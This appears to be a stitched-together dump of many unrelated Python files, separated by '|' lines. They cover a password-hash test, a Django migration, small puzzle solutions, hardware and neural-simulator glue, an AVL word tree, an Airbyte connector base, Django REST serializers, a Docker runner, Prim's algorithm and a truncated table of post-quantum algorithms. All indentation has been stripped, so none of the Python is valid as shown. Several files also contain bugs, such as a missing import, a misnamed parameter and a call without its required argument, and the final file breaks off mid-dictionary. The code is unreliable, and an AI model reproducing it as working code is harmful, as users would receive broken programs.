p = passwd('passphrase')
assert passwd_check(p, 'passphrase') == True
def test_bad():
p = passwd('passphrase')
assert passwd_check(p, p) == False
assert passwd_check(p, 'a:b:c:d') == False
assert passwd_check(p, 'a:b') == False
def test_passwd_check_unicode():
# GH issue #4524
phash = u'sha1:23862bc21dd3:7a415a95ae4580582e314072143d9c382c491e4f'
assert passwd_check(phash, u"łe¶ŧ←↓→")
phash = (u'argon2:$argon2id$v=19$m=10240,t=10,p=8$'
u'qjjDiZUofUVVnrVYxacnbA$l5pQq1bJ8zglGT2uXP6iOg')
assert passwd_check(phash, u"łe¶ŧ←↓→")
|
# Generated by Django 2.1.3 on 2018-12-26 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('maincv', '0014_testimonial_image'),
]
operations = [
migrations.CreateModel(
name='SiteConfiguration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('show_education', models.BooleanField(default=True)),
('show_experiences', models.BooleanField(default=True)),
('show_testimonials', models.BooleanField(default=True)),
],
),
]
|
def get_max_divis(in_list):
in_list.sort()
for index in range(len(in_list)):
divisor = in_list[index]
for ref in range(index+1, len(in_list)):
if in_list[ref]%divisor == 0:
return int(in_list[ref]/divisor)
return 0
def get_sum_chart(in_chart):
total_sum = 0
for row in in_chart:
max_diff = get_max_divis(row)
total_sum+= max_diff
return total_sum
if __name__ == '__main__':
num_rows = int(input())
chart = []
for row in range(num_rows):
chart.append([int(x) for x in input().split()])
sum = get_sum_chart(chart)
print(sum) |
import zlib
def compress(s):
'''
This function takes a string and converts it into a Python-compatible
string to be used in a print statement. This may come handy for
very long strings with many repetitions.
Example:
converts
"aaaa bbbb ccc\n"
to
"a"*4 + " "*4 + "b"*4 +" " + "c"*3 + "\n"
Arguments:
s a string
Returns:
a string in the ([any substring*] * n...) to be used with a print statement
in a Python script.
'''
s = list(s)
c = dict()
out = 'print("'
while s:
# with this check I assume that the last char of each of these strings
# is a \n, so I will add it once out of the loop
if len(s) == 1:
break
i = 0
#if single character, pushes it straight in the array (adds an extra
# '\' in case of a special character / backlash)
if s[i] != s[i+1]:
if s[i] == '\n':
s[i] = '\\n'
out = out + s[i] +'"+"'
# if multiple chars in a row, then counts the instances with a
# dictionary count, an pushes string with multiplication of number
# of instances (TODO: fix the ugly +1 workaround)
else:
while s[i] == s[i+1]:
if s[i] in c:
c[s[i]] +=1
else:
c[s[i]] = 1
i += 1
# TODO: the one below is the ugly +1 workaround - it does not
# count the last instance(because the next char is different)
out = out + s[i] + '"*' + str(c[s[i]] + 1) + '+"'
i = c[s[i]] # i becomes the number of instances of the char (it
# stays one if it's only one instance)
c[s[i]] = 0
del s[0:i + 1] #again, the ugly +1 workaround
# NOT REALLY NEEDED, so I commented it out;
#compress with zlib
#comp = zlib.compress((out + '\\n")').encode("ascii") ) TODO
#print(comp)
return out + '\\n")'
|
from os.path import join, dirname
from nmigen import Fragment, Signal
from cores.jtag.jtag_peripheral_connector import JTAGPeripheralConnector
from soc.peripherals_aggregator import PeripheralsAggregator
from soc.memorymap import Address
from soc.soc_platform import SocPlatform
class JTAGSocPlatform(SocPlatform):
base_address = Address(address=0x0000_0000, bit_offset=0, bit_len=0xFFFF_FFFF * 8)
pydriver_memory_accessor = open(join(dirname(__file__), "memory_accessor_openocd.py")).read()
def __init__(self, platform):
super().__init__(platform)
self.jtag_signals = Signal(11)
def peripherals_connect_hook(platform, top_fragment: Fragment, sames):
if platform.peripherals:
aggregator = PeripheralsAggregator()
for peripheral in platform.peripherals:
aggregator.add_peripheral(peripheral)
jtag_controller = JTAGPeripheralConnector(aggregator)
platform.to_inject_subfragments.append((jtag_controller, "jtag_controller"))
self.prepare_hooks.append(peripherals_connect_hook)
def pack_bitstream_fatbitstream(self, builder):
builder.append_self_extracting_blob_from_file("{{name}}.svf", "bitstream_jtag.svf")
builder.append_command("openocd -f openocd.cfg -c 'svf -tap dut.tap -quiet bitstream_jtag.svf; shutdown'\n")
|
# imports of both spynnaker and external device plugin.
import spynnaker.pyNN as Frontend
import spynnaker_external_devices_plugin.pyNN as ExternalDevices
#######################
# import to allow prefix type for the prefix eieio protocol
######################
from spynnaker_external_devices_plugin.pyNN.connections\
.spynnaker_live_spikes_connection import SpynnakerLiveSpikesConnection
# plotter in python
import pylab
import time
import random
import threading
import time
import rospy
from std_msgs.msg import Int8
pub = rospy.Publisher('/output_spikes', Int8, queue_size = 10)
def spike_received_ros_callback(msg):
id = msg.data
print "Received spike from external device: " + str(id)
live_spikes_connection_send.send_spike("spike_injector",id)
subscriber = rospy.Subscriber('/input_spikes', Int8, spike_received_ros_callback)
# Create an initialisation method
def init_pop(label, n_neurons, run_time_ms, machine_timestep_ms):
print "{} has {} neurons".format(label, n_neurons)
print "Simulation will run for {}ms at {}ms timesteps".format(
run_time_ms, machine_timestep_ms)
# Create a receiver of live spikes
def receive_spikes(label, time, neuron_ids):
global pub
for neuron_id in neuron_ids:
pub.publish(neuron_id)
# initial call to set up the front end (pynn requirement)
Frontend.setup(timestep=1.0, min_delay=1.0, max_delay=144.0)
# neurons per population and the length of runtime in ms for the simulation,
# as well as the expected weight each spike will contain
n_neurons = 100
run_time = 800000
weight_to_spike = 2.0
# neural parameters of the ifcur model used to respond to injected spikes.
# (cell params for a synfire chain)
cell_params_lif = {'cm': 0.25,
'i_offset': 0.0,
'tau_m': 20.0,
'tau_refrac': 2.0,
'tau_syn_E': 5.0,
'tau_syn_I': 5.0,
'v_reset': -70.0,
'v_rest': -65.0,
'v_thresh': -50.0
}
##################################
# Parameters for the injector population. This is the minimal set of
# parameters required, which is for a set of spikes where the key is not
# important. Note that a virtual key *will* be assigned to the population,
# and that spikes sent which do not match this virtual key will be dropped;
# however, if spikes are sent using 16-bit keys, they will automatically be
# made to match the virtual key. The virtual key assigned can be obtained
# from the database.
##################################
cell_params_spike_injector = {
# The port on which the spiNNaker machine should listen for packets.
# Packets to be injected should be sent to this port on the spiNNaker
# machine
'port': 12345,
}
##################################
# Parameters for the injector population. Note that each injector needs to
# be given a different port. The virtual key is assigned here, rather than
# being allocated later. As with the above, spikes injected need to match
# this key, and this will be done automatically with 16-bit keys.
##################################
cell_params_spike_injector_with_key = {
# The port on which the spiNNaker machine should listen for packets.
# Packets to be injected should be sent to this port on the spiNNaker
# machine
'port': 12346,
# This is the base key to be used for the injection, which is used to
# allow the keys to be routed around the spiNNaker machine. This
# assignment means that 32-bit keys must have the high-order 16-bit
# set to 0x7; This will automatically be prepended to 16-bit keys.
'virtual_key': 0x70000,
}
# create synfire populations (if cur exp)
pop = Frontend.Population(n_neurons, Frontend.IF_curr_exp,
cell_params_lif, label='pop')
# Create injection populations
injector = Frontend.Population(
n_neurons, ExternalDevices.SpikeInjector,
cell_params_spike_injector_with_key, label='spike_injector')
# Create a connection from the injector into the populations
Frontend.Projection(injector, pop,
Frontend.OneToOneConnector(weights=weight_to_spike))
# Activate the sending of live spikes
ExternalDevices.activate_live_output_for(
pop, database_notify_host="localhost",
database_notify_port_num=19996)
# Set up the live connection for sending spikes
live_spikes_connection_send = SpynnakerLiveSpikesConnection(
receive_labels=None, local_port=19999,
send_labels=["spike_injector"])
# Set up callbacks to occur at initialisation
live_spikes_connection_send.add_init_callback(
"spike_injector", init_pop)
live_spikes_connection_receive = SpynnakerLiveSpikesConnection(
receive_labels=["pop"],
local_port=19996, send_labels=None)
# Set up callbacks to occur when spikes are received
live_spikes_connection_receive.add_receive_callback(
"pop", receive_spikes)
def run():
Frontend.run(run_time)
Frontend.end()
|
##############################################################################
#
# Copyright (c) 2009 Agendaless Consulting and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the BSD-like license at
# http://www.repoze.org/LICENSE.txt. A copy of the license should accompany
# this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL
# EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND
# FITNESS FOR A PARTICULAR PURPOSE
#
##############################################################################
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = [
'pyramid',
'repoze.tm2',
'repoze.monty',
'repoze.who',
'repoze.whoplugins.zodb',
'repoze.retry',
'ZODB3',
'Pygments',
'FormEncode',
'nose',
'repoze.zodbconn',
'repoze.folder',
'PyCAPTCHA',
'Pillow',
'repoze.session',
'repoze.browserid',
'repoze.catalog',
'repoze.lemonade',
'virtualenv',
'Sphinx',
'repoze.sphinx.autointerface',
'repoze.sendmail',
'docutils',
]
setup(name='marlton',
version='0.0',
description=('A web site for Pyramid with a paste bin and a tutorial '
'bin'),
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Internet :: WWW/HTTP :: WSGI",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
keywords='paste bin tutorial pyramid wsgi website',
author="Carlos de la Guardia, Chris McDonough",
author_email="cguardia@yahoo.com",
url="http://www.delaguardia.com.mx",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
packages=find_packages(),
dependency_links = [
'http://dist.repoze.org/bfgsite/PyCAPTCHA-0.4repoze2.tar.gz'],
include_package_data=True,
zip_safe=False,
tests_require = requires,
install_requires= requires,
test_suite="nose.collector",
entry_points = """\
[paste.app_factory]
main = marlton:main
[console_scripts]
reindex_sphinx_docs = marlton.scripts.reindex_sphinx_docs:main
debug_marlton = marlton.scripts.debug:main
"""
)
|
class Solution(object):
def longestPalindrome(self, s):
"""
:type s: str
:rtype: int
"""
odds = 0
cnt_s = collections.Counter(s)
for _, val in cnt_s.items():
odds = odds + ( val & 1)
return len(s) - odds + int(odds > 0)
|
#!/usr/bin/env python3
from typing import List, Dict
import json
import os
import subprocess
import sys
def ls(wd: str) -> List[str]:
"""Returns a list of directories under ``wd`` that match the johnny.decimal
pattern. The directories returned will be related to the passed working directory."""
pattern = "[1234567890][1234567890]-*/[1234567890][1234567890]\ */[1234567890][1234567890].[1234567890][1234567890]*"
cmd = ["/bin/sh", "-c", "ls -1d %s" % pattern]
listing = subprocess.check_output(cmd, cwd=wd, text=True)
return listing.splitlines()
def item(relpath: str , wd: str) -> Dict:
"""Returns a dict to be included in the search filer results."""
basename = os.path.basename(relpath)
abspath = os.path.join(wd, relpath)
return {
"type": "file",
"title": basename,
"subtitle": relpath,
"arg": abspath,
"icon": {
"type": "fileicon",
"path": abspath,
},
}
def main():
wd: str = sys.argv[1] if len(sys.argv) == 2 else None
if not wd:
wd = os.getenv("JOHNNY_ROOT")
if not wd:
wd = os.getcwd()
wd = os.path.expanduser(wd)
results = {"items": [item(relpath, wd) for relpath in ls(wd)]}
print(json.dumps(results))
if __name__ == "__main__":
main()
|
from datetime import date
def edad(fn):
hoy = date.today()
dn, mn, an = fn.split('-')
dn = int(dn)
mn = int(mn)
an = int(an)
dh = hoy.day
mh = hoy.month
ah = hoy.year
e = ah - an
if (mn > mh) or (mn == mh and dn > dh):
e -= 1
return e
def separeNameFormalName(fullNames):
formalNames = []
names = []
for fullName in fullNames:
array = fullName.split(', ')
formalNames.append(array[1][0]+'. '+array[0])
names.append(array[1])
return formalNames, names
def nameMoreLonger(names):
total = 0
for name in names:
if len(name) > total:
total = len(name)
nameLonger = name
return nameLonger
def averageWomanAge(datesOfBitrh, generes):
total = 0
divisor = 0
for i in range(len(generes)):
if generes[i] == 'f':
total += edad(datesOfBirth[i])
divisor += 1
return int(total/divisor)
# Datos
fullNames = ['Torres, Ana', 'Hudson, Kate', 'Quesada, Benicio', 'Campoamores, Susana',
'Santamaría, Carlos', 'Skarsgard, Azul', 'Catalejos, Walter']
generes = ['f', 'f', 'm', 'f', 'm', 'f', 'm']
datesOfBirth = ['02/05/1943', '07/09/1984', '10/02/1971',
'21/12/1967', '30/01/1982', '30/08/1995', '18/07/1959']
# Ejercicio 1
formalNames, names = separeNameFormalName(fullNames)
for formalName in formalNames:
print(formalName)
# Ejercicio 2
print('El nombre más largo es:', nameMoreLonger(names))
# Ejercicio 3
for i in range(len(datesOfBirth)):
datesOfBirth[i] = datesOfBirth[i].replace('/', '-')
print('El promedio de edad de las mujeres es:',
averageWomanAge(datesOfBirth, generes))
|
__author__ = 'Netšajev'
class BinarySearchTree:
def __init__(self):
self.root = None
def __iter__(self):
return self.root.__iter__()
def max_depth(self):
temp_depth = 0
for node in self.root.__iter__():
temp_depth = max(node.get_depth(), temp_depth)
return temp_depth
def min_value(self):
"""
Returns the left-most node, not the
node with the lowest counter value
"""
current_node = self.root
if current_node:
while current_node.has_left_child():
current_node = current_node.left_child
return current_node
else:
return None
def print_tree(self, node, words=None):
if node is None:
return
# Short way with Node __iter__: print(list(node.__iter__()))
flag_start = False
if words is None:
flag_start = True
words = []
if node.has_left_child():
self.print_tree(node.left_child, words)
words.append((node.word, node.count))
if node.has_right_child():
self.print_tree(node.right_child, words)
if flag_start:
print(words)
return words
def search(self, word):
current_node = self.root
while current_node:
if word == current_node.word:
return current_node
elif word > current_node.word:
current_node = current_node.right_child
elif word < current_node.word:
current_node = current_node.left_child
else:
break
print("Word {} was not found in the tree".format(word))
return None
def put(self, word):
if self.root:
self._put(word, self.root)
else:
self.root = TreeNode(word)
def _put(self, word, current_node):
if word < current_node.word:
if current_node.has_left_child():
self._put(word, current_node.left_child)
else:
current_node.left_child = TreeNode(word, parent=current_node)
self.update_balance(current_node.left_child)
elif word > current_node.word:
if current_node.has_right_child():
self._put(word, current_node.right_child)
else:
current_node.right_child = TreeNode(word, parent=current_node)
self.update_balance(current_node.right_child)
else:
current_node.increase_word_count()
def update_balance(self, node):
if node.balance_factor > 1 or node.balance_factor < -1:
self.rebalance(node)
return
if node.parent is not None:
if node.is_left_child():
node.parent.balance_factor += 1
elif node.is_right_child():
node.parent.balance_factor -= 1
if node.parent.balance_factor != 0:
self.update_balance(node.parent)
def rotate_left(self, old_root):
new_root = old_root.right_child
old_root.right_child = new_root.left_child
if new_root.left_child is not None:
new_root.left_child.parent = old_root
new_root.parent = old_root.parent
if old_root.is_root():
self.root = new_root
else:
if old_root.is_left_child():
old_root.parent.left_child = new_root
else:
old_root.parent.right_child = new_root
new_root.left_child = old_root
old_root.parent = new_root
old_root.balance_factor = old_root.balance_factor + 1 - min(new_root.balance_factor, 0)
new_root.balance_factor = new_root.balance_factor + 1 + max(old_root.balance_factor, 0)
def rotate_right(self, old_root):
new_root = old_root.left_child
old_root.left_child = new_root.right_child
if new_root.right_child is not None:
new_root.right_child.parent = old_root
new_root.parent = old_root.parent
if old_root.is_root():
self.root = new_root
else:
if old_root.is_right_child():
old_root.parent.right_child = new_root
else:
old_root.parent.left_child = new_root
new_root.right_child = old_root
old_root.parent = new_root
old_root.balance_factor = old_root.balance_factor - 1 - max(new_root.balance_factor, 0)
new_root.balance_factor = new_root.balance_factor - 1 + min(old_root.balance_factor, 0)
def rebalance(self, node):
if node.balance_factor < 0:
if node.right_child.balance_factor > 0:
self.rotate_right(node.right_child)
self.rotate_left(node)
else:
self.rotate_left(node)
elif node.balance_factor > 0:
if node.left_child.balance_factor < 0:
self.rotate_left(node.left_child)
self.rotate_right(node)
else:
self.rotate_right(node)
def get(self, word):
if self.root:
res = self._get(word, self.root)
if res:
return res.count
else:
return None
else:
return None
def _get(self, word, current_node):
if not current_node:
return None
elif current_node.word == word:
return current_node
elif word < current_node.word:
return self._get(word, current_node.left_child)
else:
return self._get(word, current_node.right_child)
def __getitem__(self, word):
return self.get(word)
def __contains__(self, word):
if self._get(word, self.root):
return True
else:
return False
class TreeNode:
def __init__(self, word, left=None, right=None, parent=None):
self.word = word
self.count = 1
self.left_child = left
self.right_child = right
self.parent = parent
self.balance_factor = 0
if self.has_left_child():
self.left_child.parent = self
if self.has_right_child():
self.right_child.parent = self
def __iter__(self):
if self:
if self.has_left_child():
for elem in self.left_child:
yield elem
yield self
if self.has_right_child():
for elem in self.right_child:
yield elem
def get_depth(self):
if self.is_leaf():
depth = 1
current_node = self
while current_node.has_parent():
depth += 1
current_node = current_node.parent
return depth
return 0
def get_count(self):
return self.count
def has_parent(self):
return self.parent
def has_left_child(self):
return self.left_child
def has_right_child(self):
return self.right_child
def is_left_child(self):
return self.parent and self.parent.left_child == self
def is_right_child(self):
return self.parent and self.parent.right_child == self
def is_root(self):
return not self.parent
def is_leaf(self):
return not (self.right_child or self.left_child)
def has_any_children(self):
return self.right_child or self.left_child
def has_both_children(self):
return self.right_child and self.left_child
def increase_word_count(self):
self.count += 1
def __str__(self):
return str((self.word, self.count))
def process_file(opened_file):
"""Remove non-alphanumeric & set lowercase"""
result = ""
for line in opened_file:
line = line.lower()
for letter in line:
if letter.isalpha():
result += letter
else:
if len(result) > 0:
yield result
result = ""
if len(result) > 0:
yield result
def main():
filename = "Carcosa.txt"
words_tree = BinarySearchTree()
my_file = open(filename)
for word in process_file(my_file):
words_tree.put(word)
words = [(node.word, node.count) for node in words_tree.__iter__()]
print(words)
print(words_tree.min_value())
print(words_tree.root)
print(words_tree.search('liberty'))
words_tree.print_tree(words_tree.search('above'))
print("\nMaximum depth: {}".format(words_tree.max_depth()))
if __name__ == "__main__":
main() |
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import argparse
import io
import logging
import sys
from abc import ABC, abstractmethod
from typing import Any, Iterable, List, Mapping
from airbyte_cdk.connector import Connector
from airbyte_cdk.exception_handler import init_uncaught_exception_handler
from airbyte_cdk.models import AirbyteMessage, ConfiguredAirbyteCatalog, Type
from airbyte_cdk.sources.utils.schema_helpers import check_config_against_spec_or_exit
from airbyte_cdk.utils.traced_exception import AirbyteTracedException
from pydantic import ValidationError
logger = logging.getLogger("airbyte")
class Destination(Connector, ABC):
VALID_CMDS = {"spec", "check", "write"}
@abstractmethod
def write(
self, config: Mapping[str, Any], configured_catalog: ConfiguredAirbyteCatalog, input_messages: Iterable[AirbyteMessage]
) -> Iterable[AirbyteMessage]:
"""Implement to define how the connector writes data to the destination"""
def _run_check(self, config: Mapping[str, Any]) -> AirbyteMessage:
check_result = self.check(logger, config)
return AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=check_result)
def _parse_input_stream(self, input_stream: io.TextIOWrapper) -> Iterable[AirbyteMessage]:
"""Reads from stdin, converting to Airbyte messages"""
for line in input_stream:
try:
yield AirbyteMessage.parse_raw(line)
except ValidationError:
logger.info(f"ignoring input which can't be deserialized as Airbyte Message: {line}")
def _run_write(
self, config: Mapping[str, Any], configured_catalog_path: str, input_stream: io.TextIOWrapper
) -> Iterable[AirbyteMessage]:
catalog = ConfiguredAirbyteCatalog.parse_file(configured_catalog_path)
input_messages = self._parse_input_stream(input_stream)
logger.info("Begin writing to the destination...")
yield from self.write(config=config, configured_catalog=catalog, input_messages=input_messages)
logger.info("Writing complete.")
def parse_args(self, args: List[str]) -> argparse.Namespace:
"""
:param args: commandline arguments
:return:
"""
parent_parser = argparse.ArgumentParser(add_help=False)
main_parser = argparse.ArgumentParser()
subparsers = main_parser.add_subparsers(title="commands", dest="command")
# spec
subparsers.add_parser("spec", help="outputs the json configuration specification", parents=[parent_parser])
# check
check_parser = subparsers.add_parser("check", help="checks the config can be used to connect", parents=[parent_parser])
required_check_parser = check_parser.add_argument_group("required named arguments")
required_check_parser.add_argument("--config", type=str, required=True, help="path to the json configuration file")
# write
write_parser = subparsers.add_parser("write", help="Writes data to the destination", parents=[parent_parser])
write_required = write_parser.add_argument_group("required named arguments")
write_required.add_argument("--config", type=str, required=True, help="path to the JSON configuration file")
write_required.add_argument("--catalog", type=str, required=True, help="path to the configured catalog JSON file")
parsed_args = main_parser.parse_args(args)
cmd = parsed_args.command
if not cmd:
raise Exception("No command entered. ")
elif cmd not in ["spec", "check", "write"]:
# This is technically dead code since parse_args() would fail if this was the case
# But it's non-obvious enough to warrant placing it here anyways
raise Exception(f"Unknown command entered: {cmd}")
return parsed_args
def run_cmd(self, parsed_args: argparse.Namespace) -> Iterable[AirbyteMessage]:
cmd = parsed_args.command
if cmd not in self.VALID_CMDS:
raise Exception(f"Unrecognized command: {cmd}")
spec = self.spec(logger)
if cmd == "spec":
yield AirbyteMessage(type=Type.SPEC, spec=spec)
return
config = self.read_config(config_path=parsed_args.config)
if self.check_config_against_spec or cmd == "check":
try:
check_config_against_spec_or_exit(config, spec)
except AirbyteTracedException as traced_exc:
connection_status = traced_exc.as_connection_status_message()
if connection_status and cmd == "check":
yield connection_status.json(exclude_unset=True)
return
raise traced_exc
if cmd == "check":
yield self._run_check(config=config)
elif cmd == "write":
# Wrap in UTF-8 to override any other input encodings
wrapped_stdin = io.TextIOWrapper(sys.stdin.buffer, encoding="utf-8")
yield from self._run_write(config=config, configured_catalog_path=parsed_args.catalog, input_stream=wrapped_stdin)
def run(self, args: List[str]):
init_uncaught_exception_handler(logger)
parsed_args = self.parse_args(args)
output_messages = self.run_cmd(parsed_args)
for message in output_messages:
print(message.json(exclude_unset=True))
|
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from care.facility.models import MedibaseMedicine, MedicineAdministration, Prescription
from care.users.api.serializers.user import UserBaseMinimumSerializer
class MedibaseMedicineSerializer(serializers.ModelSerializer):
id = serializers.UUIDField(source="external_id", read_only=True)
class Meta:
model = MedibaseMedicine
exclude = ("deleted",)
read_only_fields = (
"external_id",
"created_date",
"modified_date",
)
class PrescriptionSerializer(serializers.ModelSerializer):
id = serializers.UUIDField(source="external_id", read_only=True)
prescribed_by = UserBaseMinimumSerializer(read_only=True)
last_administered_on = serializers.SerializerMethodField()
medicine_object = MedibaseMedicineSerializer(read_only=True, source="medicine")
medicine = serializers.UUIDField(write_only=True)
def get_last_administered_on(self, obj):
last_administration = (
MedicineAdministration.objects.filter(prescription=obj)
.order_by("-created_date")
.first()
)
if last_administration:
return last_administration.created_date
return None
class Meta:
model = Prescription
exclude = (
"consultation",
"deleted",
)
read_only_fields = (
"medicine_old",
"external_id",
"prescribed_by",
"created_date",
"modified_date",
"discontinued_date",
"is_migrated",
)
def validate(self, attrs):
if "medicine" in attrs:
attrs["medicine"] = get_object_or_404(
MedibaseMedicine, external_id=attrs["medicine"]
)
if attrs.get("is_prn"):
if not attrs.get("indicator"):
raise serializers.ValidationError(
{"indicator": "Indicator should be set for PRN prescriptions."}
)
else:
if not attrs.get("frequency"):
raise serializers.ValidationError(
{"frequency": "Frequency should be set for prescriptions."}
)
return super().validate(attrs)
# TODO: Ensure that this medicine is not already prescribed to the same patient and is currently active.
class MedicineAdministrationSerializer(serializers.ModelSerializer):
id = serializers.UUIDField(source="external_id", read_only=True)
administered_by = UserBaseMinimumSerializer(read_only=True)
prescription = PrescriptionSerializer(read_only=True)
class Meta:
model = MedicineAdministration
exclude = ("deleted",)
read_only_fields = (
"external_id",
"administered_by",
"created_date",
"modified_date",
"prescription",
)
|
import os
import docker
import time
def handle_container(file_name):
client = docker.from_env()
#create container and detach
container = client.containers.run('broncode_r', detach = True)
#wait until the container is running
while "created" in container.status:
container.reload()
#TODO: get docker-py to do this...
#we should get docker py to do this...
os.system("docker cp "+file_name+" "+container.id+":/")
#wait until the container is exited
while "running" in container.status:
container.reload()
log = container.logs().decode("utf-8")
return(log)
def write_code_file(file_name):
code = "hello <- \"Hello World!\" \n" \
"print(hello) \n"
out_file = open(file_name,"w")
out_file.write(str(code))
def run_time_trial():
reps = 20
start_time = time.time()
for i in range(0,reps):
handle_container()
elapsed_time = time.time() - start_time
elap = str(elapsed_time/reps)
print("Average time to run container is "+elap+" sec\n")
def main():
#TODO: consider logging inputs and outputs
code_file_name = "code.r"
write_code_file(code_file_name)
log = handle_container(code_file_name)
print(log)
#TODO: clean up code.py
if __name__ == "__main__":
main()
|
def i_am_this_old(age):
print('I am '+ str(age) + ' old')
my_age = 24
i_am_this_old(my_age)
if (my_age) > 23:
print("not real")
elif my_age == 24:
print("that's not real")
else:
print("you are fake news")
print("done")
a_list = []
for nubmer in range(10):
a_list.append('a')
|
# lets draw some stuff with ciaro!
from math import pi
import cairo
def to_cairo(pos, num_strings=6):
width, height = 300, 400
w, h = 0.6, 0.8*height/width
surface = cairo.ImageSurface(cairo.Format.ARGB32, width, height)
cr = cairo.Context(surface)
cr.translate(width/2, height/2)
cr.scale(width, width)
cr.set_source_rgba(1.0, 1.0, 1.0, 1.0)
# fill bg
cr.paint()
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
# draw strings
n = num_strings - 1
string = [-w/2 + w/n*i for i in range(num_strings)]
for x in string:
cr.move_to(x, +h/2)
cr.line_to(x, -h/2)
# draw frets
n = 5
fret = []
for i in range(n + 1):
cr.move_to(-w/2, +h/2 - h/n*i)
cr.line_to(+w/2, +h/2 - h/n*i)
fret.append(-h/2 + h/n*(i - 0.5))
cr.set_line_width(0.01)
cr.set_line_cap(cairo.LineCap.SQUARE)
cr.stroke()
# draw positions
r = 0.05
for p in pos:
x = string[p[0]]
y = fret[p[1]]
cr.arc(x, y, r, 0.0, 2.0*pi)
cr.fill()
surface.write_to_png('pic.png')
def main():
pos = [(0, 1), (1, 2), (3, 4)]
to_cairo(pos)
if __name__ == '__main__':
main()
|
from functools import reduce
from math import inf as Infinity
import pprint
pp = pprint.PrettyPrinter(indent=1)
def prim(graph):
## MST: list of vertices currently in MST (uses None for index(0) for consistency)
## MSTedges: list of edges currently in MST
## MSTfilled: boolean indicating whether a given vertex is in the MST
gv = graph['vertices']
MST, MSTedges, MSTfilled = [None, gv[1]], [], [False, True]
## Initialize MST and MSTFilled
for i in range(2, len(gv)):
MST.append([])
MSTfilled.append(False)
## Iterate until MST contains all vertices (all MSTfilled positions are True)
while not reduce(lambda x, y: x and y, MSTfilled[1:]):
cheapestEdge = (None, None, Infinity) ## cheapestEdge initialized as having infinite cost
for i in range(1, len(MST)):
for edge in MST[i]:
## If this edge weight < current smallest edge weight AND other vertex is not currently in MST
if edge[1] < cheapestEdge[2] and not MSTfilled[edge[0]]:
cheapestEdge = (i, edge[0], edge[1])
## print(cheapestEdge)
MSTedges.append(cheapestEdge) ## add cheapestEdge to MSTedges list
MST[cheapestEdge[1]] = gv[cheapestEdge[1]] ## add end vertex of cheapestEdge to MST
MSTfilled[cheapestEdge[1]] = True ## indicate the vertex is now part of the MST
return reduce(lambda x, y: x + y[2], MSTedges, 0);
def get_graph_from_file(filename):
inputList, vertices, edges = list(open(filename)), [None], []
## Insert an empty list for all vertices in the input
## None used for the 0th index (each numbered vertex resides at its index)
for i in range(1, int(inputList[0].rstrip('\n').split(' ')[0]) + 1):
vertices.append([])
## Iterate through all edges, append edge to edges and to both vertexes' edge lists
## Note different tuple edge representations in edges and vertices
for rawStr in inputList[1:]:
strToList = rawStr.rstrip('\n').split(' ')
startVertex, endVertex, weight = map(int, strToList)
edges.append((startVertex, endVertex, weight))
vertices[startVertex].append((endVertex, weight))
vertices[endVertex ].append((startVertex, weight))
return {'vertices': vertices, 'edges': edges}
##graph = [[{'endVertex': 2, 'weight': 1}, {'endVertex': 8, 'weight': 2}], [{'endVertex': 1, 'weight': 1}, {'endVertex': 3, 'weight': 1}], [{'endVertex': 2, 'weight': 1}, {'endVertex': 4, 'weight': 1}], [{'endVertex': 3, 'weight': 1}, {'endVertex': 5, 'weight': 1}], [{'endVertex': 4, 'weight': 1}, {'endVertex': 6, 'weight': 1}], [{'endVertex': 5, 'weight': 1}, {'endVertex': 7, 'weight': 1}], [{'endVertex': 6, 'weight': 1}, {'endVertex': 8, 'weight': 1}], [{'endVertex': 7, 'weight': 1}, {'endVertex': 1, 'weight': 2}]]
graph = get_graph_from_file('data/primData.txt')
print(prim(graph))
|
number = int(input())
count = 0
for i in range(1, number):
if number % i == 0:
count += 1
if count > 2:
print("False")
else:
print("True") |
ALGORITHMS = {
"firesaber": {"path": "firesaber", "is_kem": True},
"frodokem1344aes": {"path": "frodokem1344aes", "is_kem": True},
"frodokem1344shake": {"path": "frodokem1344shake", "is_kem": True},
"frodokem640aes": {"path": "frodokem640aes", "is_kem": True},
"frodokem640shake": {"path": "frodokem640shake", "is_kem": True},
"frodokem976aes": {"path": "frodokem976aes", "is_kem": True},
"frodokem976shake": {"path": "frodokem976shake", "is_kem": True},
"kyber1024": {"path": "kyber1024", "is_kem": True},
"kyber1024_90s": {"path": "kyber1024-90s", "is_kem": True},
"kyber512": {"path": "kyber512", "is_kem": True},
"kyber512_90s": {"path": "kyber512-90s", "is_kem": True},
"kyber768": {"path": "kyber768", "is_kem": True},
"kyber768_90s": {"path": "kyber768-90s", "is_kem": True},
"lightsaber": {"path": "lightsaber", "is_kem": True},
"mceliece348864": {"path": "mceliece348864", "is_kem": True, "generate_in_threadpool": True},
"mceliece348864f": {"path": "mceliece348864f", "is_kem": True, "generate_in_threadpool": True},
"mceliece460896": {"path": "mceliece460896", "is_kem": True, "generate_in_threadpool": True},
"mceliece460896f": {"path": "mceliece460896f", "is_kem": True, "generate_in_threadpool": True},
"mceliece6688128": {"path": "mceliece6688128", "is_kem": True, "generate_in_threadpool": True},
"mceliece6688128f": {"path": "mceliece6688128f", "is_kem": True, "generate_in_threadpool": True},
"mceliece6960119": {"path": "mceliece6960119", "is_kem": True, "generate_in_threadpool": True},
"mceliece6960119f": {"path": "mceliece6960119f", "is_kem": True, "generate_in_threadpool": True},
"mceliece8192128": {"path": "mceliece8192128", "is_kem": True, "generate_in_threadpool": True},
"mceliece8192128f": {"path": "mceliece8192128f", "is_kem": True, "generate_in_threadpool": True},
"ntruhps2048509": {"path": "ntruhps2048509", "is_kem": True},
